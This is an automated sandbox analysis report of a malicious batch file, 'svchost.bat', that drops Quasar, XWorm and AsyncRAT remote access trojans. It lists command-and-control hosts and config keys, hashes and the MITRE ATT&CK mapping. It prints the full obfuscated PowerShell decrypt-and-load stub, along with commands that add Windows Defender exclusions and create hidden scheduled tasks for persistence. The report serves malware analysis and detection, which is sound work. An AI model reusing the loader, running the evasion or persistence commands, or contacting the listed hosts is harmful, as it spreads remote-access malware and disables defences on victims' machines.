Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    02-07-2024 13:15

General

  • Target

    svchost.bat

  • Size

    608KB

  • MD5

    0598b47f8cba2aa8042d5241594a2a18

  • SHA1

    2f9923a0cd52476a33e005156675c19d445a627f

  • SHA256

    edd1a3237614dc5b6554baaf7f937285850b22b294bfe506309549cb4f62984e

  • SHA512

    146fb2f4ba190434ac42c22054c992fd4276da789145401fab9702e3e8cb140194be5c49bc00b20de58557f0d3e4425e80029113fc2cd55dcdc5dbb59306ccd1

  • SSDEEP

    12288:NK2Dh0mFsRXQ7ZpK1b4Bdbi6EGv8/K9yxnQ3nzvc7l87wrJJ3HMU:Nhjsxb4B0KAxnww7y7+v

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Extracted

Family

xworm

C2

super-nearest.gl.at.ply.gg:17835

best-bird.gl.at.ply.gg:27196

wiz.bounceme.net:6000

Attributes
  • Install_directory

    %ProgramData%

aes.plain

Extracted

Family

asyncrat

Botnet

Default

C2

finally-grande.gl.at.ply.gg:25844

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

stop-largely.gl.at.ply.gg:27116

Mutex

$Sxr-kl1r656AGsPQksTmi8

Attributes
  • encryption_key

    WyBm1iVkHZmEnGPMAZWV

  • install_name

    $phantom.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    $phantomSTARTUP~MSF

  • subdirectory

    $phantom

Signatures

  • AsyncRat

    AsyncRAT is a remote access tool written in C#, designed to remotely monitor and control other computers.

  • Detect Xworm Payload 5 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 3 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\svchost.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1552
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bhgsIZ9ntR3QuSTVrlc5WGQlDCUzkxlFUOsGaWn8ZvI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('noHuYoYEf1PqzBYbzxQgMQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ktoSe=New-Object System.IO.MemoryStream(,$param_var); $bKMAR=New-Object System.IO.MemoryStream; $edDvw=New-Object System.IO.Compression.GZipStream($ktoSe, [IO.Compression.CompressionMode]::Decompress); $edDvw.CopyTo($bKMAR); $edDvw.Dispose(); $ktoSe.Dispose(); $bKMAR.Dispose(); $bKMAR.ToArray();}function execute_function($param_var,$param2_var){ $lunRh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UKjYh=$lunRh.EntryPoint; $UKjYh.Invoke($null, $param2_var);}$GUFyk = 'C:\Users\Admin\AppData\Local\Temp\svchost.bat';$host.UI.RawUI.WindowTitle = $GUFyk;$AaqEv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GUFyk).Split([Environment]::NewLine);foreach ($YpNpy in $AaqEv) { if ($YpNpy.StartsWith('HstmKcMNumVqNXjUlxly')) { $PHZNA=$YpNpy.Substring(20); break; }}$payloads_var=[string[]]$PHZNA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
      PID:3220
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1248
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_876_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_876.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4348
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_876.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3060
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_876.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4832
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bhgsIZ9ntR3QuSTVrlc5WGQlDCUzkxlFUOsGaWn8ZvI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('noHuYoYEf1PqzBYbzxQgMQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ktoSe=New-Object System.IO.MemoryStream(,$param_var); $bKMAR=New-Object System.IO.MemoryStream; $edDvw=New-Object System.IO.Compression.GZipStream($ktoSe, [IO.Compression.CompressionMode]::Decompress); $edDvw.CopyTo($bKMAR); $edDvw.Dispose(); $ktoSe.Dispose(); $bKMAR.Dispose(); $bKMAR.ToArray();}function execute_function($param_var,$param2_var){ $lunRh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UKjYh=$lunRh.EntryPoint; $UKjYh.Invoke($null, $param2_var);}$GUFyk = 'C:\Users\Admin\AppData\Roaming\Windows_Log_876.bat';$host.UI.RawUI.WindowTitle = $GUFyk;$AaqEv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GUFyk).Split([Environment]::NewLine);foreach ($YpNpy in $AaqEv) { if ($YpNpy.StartsWith('HstmKcMNumVqNXjUlxly')) { $PHZNA=$YpNpy.Substring(20); break; }}$payloads_var=[string[]]$PHZNA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
              5⤵
              PID:2428
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:4720
                • C:\Users\Admin\AppData\Local\Temp\Windows PowerShell.exe
                  "C:\Users\Admin\AppData\Local\Temp\Windows PowerShell.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2148
                • C:\Users\Admin\AppData\Local\Temp\conhost.exe
                  "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:4536
                • C:\Users\Admin\AppData\Local\Temp\7zip.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zip.exe"
                  6⤵
                  • Checks computer location settings
                  • Drops startup file
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:2416
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zip.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:4388
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '7zip.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:4956
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\7zip.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:4728
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "7zip" /tr "C:\ProgramData\7zip.exe"
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2564
                • C:\Users\Admin\AppData\Local\Temp\wininit.exe
                  "C:\Users\Admin\AppData\Local\Temp\wininit.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:2196
                  • C:\Windows\SysWOW64\schtasks.exe
                    "schtasks" /create /tn "$phantomSTARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\wininit.exe" /rl HIGHEST /f
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3468
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:3152
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:3432
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WINDOWSBIOS .COM'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:2060
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WINDOWSBIOS .COM'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:2236
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WINDOWSBIOS " /tr "C:\ProgramData\WINDOWSBIOS .COM"
                  6⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:3412
  • C:\ProgramData\7zip.exe
    C:\ProgramData\7zip.exe
    1⤵
    • Executes dropped EXE
    PID:3008
  • C:\ProgramData\7zip.exe
    C:\ProgramData\7zip.exe
    1⤵
    • Executes dropped EXE
    PID:1348
  • C:\ProgramData\7zip.exe
    C:\ProgramData\7zip.exe
    1⤵
    • Executes dropped EXE
    PID:3312

Network

MITRE ATT&CK Matrix (ATT&CK v13)

Execution
  • Command and Scripting Interpreter (T1059): 1
    • PowerShell (T1059.001): 1
  • Scheduled Task/Job (T1053): 1
    • Scheduled Task (T1053.005): 1

Persistence
  • Boot or Logon Autostart Execution (T1547): 1
    • Registry Run Keys / Startup Folder (T1547.001): 1
  • Scheduled Task/Job (T1053): 1
    • Scheduled Task (T1053.005): 1

Privilege Escalation
  • Boot or Logon Autostart Execution (T1547): 1
    • Registry Run Keys / Startup Folder (T1547.001): 1
  • Scheduled Task/Job (T1053): 1
    • Scheduled Task (T1053.005): 1

Defense Evasion
  • Modify Registry (T1112): 1

Discovery
  • Query Registry (T1012): 2
  • System Information Discovery (T1082): 2

Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\7zip.exe.log
        Filesize

        654B

        MD5

        2ff39f6c7249774be85fd60a8f9a245e

        SHA1

        684ff36b31aedc1e587c8496c02722c6698c1c4e

        SHA256

        e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

        SHA512

        1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        661739d384d9dfd807a089721202900b

        SHA1

        5b2c5d6a7122b4ce849dc98e79a7713038feac55

        SHA256

        70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

        SHA512

        81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        2KB

        MD5

        005bc2ef5a9d890fb2297be6a36f01c2

        SHA1

        0c52adee1316c54b0bfdc510c0963196e7ebb430

        SHA256

        342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

        SHA512

        f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        ade8b780188478d4bf68c97bc995b06f

        SHA1

        0b5124fca500da8f833a3be98bd5f732d3962343

        SHA256

        318ce58720b7608811b1177c41ce0f7ec0437783db8ed188acbc523d08a3646b

        SHA512

        c9d19f196b25e62bb6f717c46ec892b18d243646afdae4b848ce30802d1df4e5576bf6328ac88ce8bca01f17fed79da778ecfeb770fe0bcc14d167ad577fcc13

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        6d42b6da621e8df5674e26b799c8e2aa

        SHA1

        ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

        SHA256

        5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

        SHA512

        53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        72903459f297d1561ed59e88f6266c39

        SHA1

        22275691405b29149354de4bf3a40bd7cef6f6de

        SHA256

        34dd19ebba6598d5f586b5c7ac30babf89d055b5f1a6e959129a39311fe4026b

        SHA512

        6c04ccf522b8b544de9da57b791e7f4a3ff1de200f8a641de106f75270759e04ba028fd6db7e3784bb0233ac3c1f92ec3473d703b9ac585d4851d277d12db10f

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        62d94562013cad250e309b4091503254

        SHA1

        f658f6e53e980694f5ff5bae10455c21ee059a2e

        SHA256

        1ff2d02730e490230262e82169d667b1db011b405f53b3bb4345ed1ee3efc1d5

        SHA512

        282e6777407b759ba15e7410cefc8652ae362a5e9ae13dfb355a3044154ca018a8de2b98df0e83012ae98279480ee3b517c62d33c8122f078ea5f3732aaa2a97

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        34f595487e6bfd1d11c7de88ee50356a

        SHA1

        4caad088c15766cc0fa1f42009260e9a02f953bb

        SHA256

        0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

        SHA512

        10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        22310ad6749d8cc38284aa616efcd100

        SHA1

        440ef4a0a53bfa7c83fe84326a1dff4326dcb515

        SHA256

        55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

        SHA512

        2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

      • C:\Users\Admin\AppData\Local\Temp\7zip.exe
        Filesize

        81KB

        MD5

        6fac9c3612488908d9aa6ed9e8234f9f

        SHA1

        8b36017162e06e76a450e2ecceee4d3a68bb3905

        SHA256

        0ca49b53ed70a9fabe46a92daa4a134f1afaf99b9098f81e33084a95c8586606

        SHA512

        e71b4cef4f488fc2cc771c1df5466ed6edd12d5cf3bfcf2825f0ec87bbcb66afabcba957dbfeee621e3c03e897bec1cede8d88f3c9e255b4fd40ddbdfaa5794e

      • C:\Users\Admin\AppData\Local\Temp\Windows PowerShell.exe
        Filesize

        27KB

        MD5

        4daae2de5a31125d02b057c1ff18d58f

        SHA1

        e1d603edfcc150a4718e2916ae3dda3aa9548dc8

        SHA256

        25510f3aa1b879ea92a3cba9583d73e447b8765bae6dfcc4954bb72df5beaa7f

        SHA512

        7cda96a69f9cddab307f3f08e1f38a4d059f0cc7f7119d4a48891efdb01cf101ebcc06cb2ce0702ea2d689d27ee45faddc0a13cd72503c609c4e544919549a2a

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kksidhr4.4rq.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\conhost.exe
        Filesize

        63KB

        MD5

        ec57b49d155e05d971f73e2eb3d3d01f

        SHA1

        f8537e9b44342a71f1f8bf48548b27574f17ff7c

        SHA256

        baf3237f6c2b6c49ca7572213bc72f0dea9a4afcd37f90ea2d13a542d83d2a9c

        SHA512

        e27191657d4339d44dfb32a637efe1168d57520ee1c320dc7997f8944c627595e66abe72ed5039f005b01e2e2d1a5ca9df7c5a10ad0092305c07dd64f29ff533

      • C:\Users\Admin\AppData\Local\Temp\wininit.exe
        Filesize

        409KB

        MD5

        301613f1fcda48ebade4c197175be1a0

        SHA1

        03f58ab72f3c2d991418861adfc9c3b3289640a0

        SHA256

        1772f8bfc84772485e5b2388bb8942c28a9f2803a5f879e275d9b9d3eb923d41

        SHA512

        375c55fc09f1f0ef1a394b57f38916f103c36aaf8f4ec9a6939dcfaf147ebc3121537f2ebe1061b3851043dd44001f0a6630abe8e32549bf95d3e12f81308525

      • C:\Users\Admin\AppData\Roaming\Windows_Log_876.bat
        Filesize

        608KB

        MD5

        0598b47f8cba2aa8042d5241594a2a18

        SHA1

        2f9923a0cd52476a33e005156675c19d445a627f

        SHA256

        edd1a3237614dc5b6554baaf7f937285850b22b294bfe506309549cb4f62984e

        SHA512

        146fb2f4ba190434ac42c22054c992fd4276da789145401fab9702e3e8cb140194be5c49bc00b20de58557f0d3e4425e80029113fc2cd55dcdc5dbb59306ccd1

      • C:\Users\Admin\AppData\Roaming\Windows_Log_876.vbs
        Filesize

        115B

        MD5

        995831d3bba7837f1b3acc03ffe50c25

        SHA1

        4223009495a9b47c997162b78bff72c7f4323b57

        SHA256

        465374b758b74b4f969922fa248fcd7d7b83ceade999a21f8c0dacc0787d43f7

        SHA512

        8e12d3372570310e6e0a06d639bd12264efebce809f0f17d9c2ad5bb7a6c79775a975c871e2f8274b23033c3d680f314909cde1465a84b0f86a517d0d42606ed

      • memory/1248-50-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp
        Filesize

        10.8MB

      • memory/1248-15-0x000001E19CE00000-0x000001E19CE08000-memory.dmp
        Filesize

        32KB

      • memory/1248-11-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp
        Filesize

        10.8MB

      • memory/1248-12-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp
        Filesize

        10.8MB

      • memory/1248-13-0x000001E19F270000-0x000001E19F2B4000-memory.dmp
        Filesize

        272KB

      • memory/1248-14-0x000001E19F340000-0x000001E19F3B6000-memory.dmp
        Filesize

        472KB

      • memory/1248-6-0x000001E19CDB0000-0x000001E19CDD2000-memory.dmp
        Filesize

        136KB

      • memory/1248-16-0x000001E19F3C0000-0x000001E19F476000-memory.dmp
        Filesize

        728KB

      • memory/1248-0-0x00007FFA20523000-0x00007FFA20525000-memory.dmp
        Filesize

        8KB

      • memory/2148-104-0x0000000001840000-0x0000000001850000-memory.dmp
        Filesize

        64KB

      • memory/2148-102-0x0000000000F00000-0x0000000000F0E000-memory.dmp
        Filesize

        56KB

      • memory/2196-108-0x0000000005430000-0x0000000005496000-memory.dmp
        Filesize

        408KB

      • memory/2196-123-0x0000000006CC0000-0x0000000006CCA000-memory.dmp
        Filesize

        40KB

      • memory/2196-106-0x0000000005380000-0x0000000005412000-memory.dmp
        Filesize

        584KB

      • memory/2196-103-0x0000000000A40000-0x0000000000AAC000-memory.dmp
        Filesize

        432KB

      • memory/2196-109-0x0000000006090000-0x00000000060A2000-memory.dmp
        Filesize

        72KB

      • memory/2196-110-0x00000000065D0000-0x000000000660C000-memory.dmp
        Filesize

        240KB

      • memory/2196-105-0x00000000059E0000-0x0000000005F84000-memory.dmp
        Filesize

        5.6MB

      • memory/2416-99-0x0000000000A60000-0x0000000000A7A000-memory.dmp
        Filesize

        104KB

      • memory/2416-201-0x0000000002C80000-0x0000000002C8E000-memory.dmp
        Filesize

        56KB

      • memory/4348-32-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp
        Filesize

        10.8MB

      • memory/4348-29-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp
        Filesize

        10.8MB

      • memory/4348-28-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp
        Filesize

        10.8MB

      • memory/4348-18-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp
        Filesize

        10.8MB

      • memory/4536-97-0x0000000000120000-0x0000000000136000-memory.dmp
        Filesize

        88KB

      • memory/4720-59-0x0000026E76B80000-0x0000026E76B98000-memory.dmp
        Filesize

        96KB